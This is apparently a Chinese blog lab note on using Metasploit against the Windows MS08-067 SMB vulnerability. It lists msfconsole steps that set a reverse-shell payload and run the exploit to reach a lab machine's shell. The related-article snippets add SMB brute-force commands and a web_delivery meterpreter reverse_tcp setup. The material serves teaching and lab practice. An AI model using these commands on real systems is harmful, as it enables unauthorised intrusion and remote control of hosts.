kali渗透测试与教学笔记7:

最新推荐文章于 2023-12-12 19:27:57 发布
最新推荐文章于 2023-12-12 19:27:57 发布
阅读量336 收藏
点赞数
分类专栏: kali
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lm19770429/article/details/105716641
版权

windows服务渗透攻击实战——MS08-067安全漏洞

进入msfconsole

search ms08_067

use exploit/windows/smb/ms_08_067_netapi

show payloads

set payload generic/shell_reverse_tcp

set targets :注意不能按下图设置targets,有可能因为msf版本不同,targets编号不同,这里选择0,进行系统自动探测。

show options

show targets

设置各必要选项如下:

exploit开始攻击

成功后,可以进入靶机命令行

漏洞分析:

查看msf的攻击的代码/usr/share/metasploit-framework/modules/exploits/windows/smb/ms08_067_netapi.rb

可以发现漏洞文件是NetAPI32.dll,在c:\windows\system32\下

动态分析用OllyDBG.exe

难。。。。

 

 

花纵酒
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
大学霸Kali安全渗透教程.zip
06-28
大学霸Kali安全渗透教程.zip
Kali Linux渗透测试技术详解 主编:杨波、王晓卉,李亚伟 PDF
05-20
Kali Linux渗透测试技术详解 主编:杨波、王晓卉,李亚伟 PDF
学习笔记(10):Kali Linux渗透测试全程课与脚本语言编程系列课程-逻辑运算符
qq_42226776的博客
04-22 128
一、课程概要         本课程主要分享分享Kali Linux渗透测试全程课与脚本语言编程系列课程! 二、课程目标          本课程致力于帮助广大学员掌握Kali Linux渗透测试与编程技巧! 三、适合人员 ...
Kali进行web渗透笔记(一)
小勇的博客
06-12 1394
Insider attacks are more lethal than the one achieved by an external entity,so sometimes Black box testing would be a waste of money and time . Career as a penetration tester is not a sprint,it is a ma
kali渗透测试教学笔记8
lm19770429的专栏
04-24 250
第三方网路服务渗透攻击实战:Oracle数据库
我的渗透笔记kali基本操作
xf555er的博客
03-12 961
一、虚拟机安装VMtools 1、安装vmtools软件 2、文件解压,用到tar zvxf命令 3、进入解压后的文件夹,然后运行安装文件,安装一直点默认就可以了(一直按回车键) 二、kali更新源的修改 阿里的更新源: #阿里云 deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib deb-src htt...
【学神IT教育渗透第一部分】
Marsal的博客
04-14 1108
1.fscan(内网扫描工具) fscan.exe -h 192.168.1.1/24 (默认使用全部模块) fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加载指定文件的用户名、密码来进行爆破 fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb密码碰撞) 2.netdiscover(网络扫描工具) netdiscover -i eth0 -r 192.168.1.1/24 主
Kali Linux渗透测试技术详解
最新发布
02-19
Kali Linux渗透测试技术详解本书由浅入深地介绍了Kali Linux的各种渗透测试技术。书中选取了最核心和最基础的内容进行讲解,让读者能够掌握渗透测试的流程,而不会被高难度的内容所淹没。本书涉及面广,从基本的知识...
Kali渗透测试技术实战
07-24
硬盘最小120G,尤其是在密码破解、取证和做渗透测试项目的情况下,要求获得控制权限,大量生成数据、收集证据、生成日志和报告。 第三章 软件、补丁和升级 第四章 配置 kali 第五章渗透测试实验环境 第六章渗透测试...
Kali 渗透测试 pdf
04-08
Kali 渗透测试 pdf
KALi 渗透测试
09-13
通过kali系统详细的介绍渗透测试过程,通过工具渗透,带来渗透测试思路
msf基础使用
longwanlian的博客
12-12 456
终端输入msfconsole。
详尽的msf——meterpreter——渗透测试教程
m0_61101264的博客
11-02 444
本文仅供学习参考使用,切勿用于非法事情!!众所周知,msf是大家公认的神器,年少不知msf香,总想自己写程序。现在发现msf很厉害,可以在它的基础上开发。msf是框架,什么意思呢,用它可以做渗透攻击的一整套流程,包括前期探索(发育),中期攻击(开团),后期控守(推塔)我们可以在msfconsole上,开发自己的程序(用自己的英雄),程序可以利用msf中的模块(用它的装备)Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。
msf学习之旅
12306小哥
11-11 934
从八月份到十一月份,从Antiy到新单位,现在算是正式落下脚。开始研究一些新的东西。上周正好有点时间,就在本地复现了三个msf系列的漏洞。做了相关记录,分享出来,网上也有相关文章,可以学习参考。 Microsoft Windows Server服务远程缓冲区溢出漏洞(MS06-040) #msfconsole msf > search ms06-040 msf > use ...
kali利用msf工具对ms08-067漏洞入侵靶机(win xp2)
qq_50854662的博客
05-16 5900
kali利用msf工具对ms08-067漏洞入侵靶机(win xp2) 漏洞简介 MS08-067漏洞将会影响Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。 如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利
云曦暑期学习第六周——kali
2202_75317918的博客
08-21 404
云曦暑期学习第六周——kali
msf命令
净邪的博客
03-08 3330
基础命令概览:back(返回): 从目前的情况下向后移动banner:Display an awesome metasploit bannercd: 改变当前的工作目录color: 切换颜色connect(远程连接): 与主机通信edit(编辑): ...
msf作为控制端使用
帅醉了的博客
05-02 206
命令执行上,去拿shell use exploit/multi/script/web_delivery show options set target 1 set payload php/meterpreter/reverse_tcp set lhost 192.168.232.136 run 执行此代码 php -d allow_url_fopen=true -r "eval(file_...
KaliLinux 安装失败/TARGET没有挂载系统
goandgetsome的博客
07-27 1983
问题:KaliLinux 安装失败/TARGET没有挂载系统 解决方法:将系统空间由20G改为40G (大于20G) 问题:系统安装完毕后进入系统多次输入账号与密码无效 解决方法:故意输错账号与密码,之后点击取消重新输入正确的账号和密码
Kali Linux渗透测试实战:安装与Metasploit应用
本文档详细介绍了Kali Linux的安装与使用,特别是对于渗透测试的学习和实践。Kali Linux是专为安全渗透测试设计的操作系统,继承了BackTrack的功能并持续更新,包含众多安全工具,便于专业人士进行测试和攻防演练。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值